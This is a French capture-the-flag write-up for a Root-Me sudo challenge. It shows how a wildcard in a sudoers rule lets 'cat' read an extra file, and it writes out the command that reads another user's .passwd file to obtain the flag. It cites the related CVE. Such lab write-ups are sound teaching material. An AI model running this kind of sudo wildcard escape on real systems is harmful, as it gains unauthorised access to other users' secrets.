La commande sudo -l permet de lister les commandes autorisées par sudo pour l'utilisateur

Il est affiché :

================================================================================================================================
Matching Defaults entries for app-script-ch1 on challenge02:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !mail_always, !mail_badpass,
    !mail_no_host, !mail_no_perms, !mail_no_user

User app-script-ch1 may run the following commands on challenge02:
    (app-script-ch1-cracked) /bin/cat /challenge/app-script/ch1/notes/*
================================================================================================================================

On apprend que la commande cat est utilisable, uniquement pour le path " /challenge/app-script/ch1/notes/* ", il est aussi necessaire 
de passer par l'user "app-script-ch1-cracked" pour que la commande en sudo soit autorisée :

### sudo -u app-script-ch1-cracked cat /challenge/app-script/ch1/notes/* ###

Une todo-list apparait :

================================================================================================================================
#####################
        Todo

- Change DHCP pool
- Change IP routing
- Beef up the fw
================================================================================================================================

La documentation fournie avec le challenge averti sur le danger des wildcards pour la configuration du sudo (voir p.36-37)
https://repository.root-me.org/Administration/Unix/EN%20-%20sudo%20you%20are%20doing%20it%20wrong.pdf

Il apparait possible de rediriger une commande sudo vers d'autres fichiers de la mainiere suivante :

### sudo -u app-script-ch1-cracked cat /challenge/app-script/ch1/notes/* /challenge/app-script/ch1/ch1cracked/.passwd ###

le flag s'affichera en dessous de la todo-list :)

Cette vulnérabilité pouvait etre exploitée sur les versions précedant la 1.8.15 de sudo. Plus d'infos ici :
https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-4-wildcards/
https://www.cvedetails.com/cve/CVE-2015-5602/
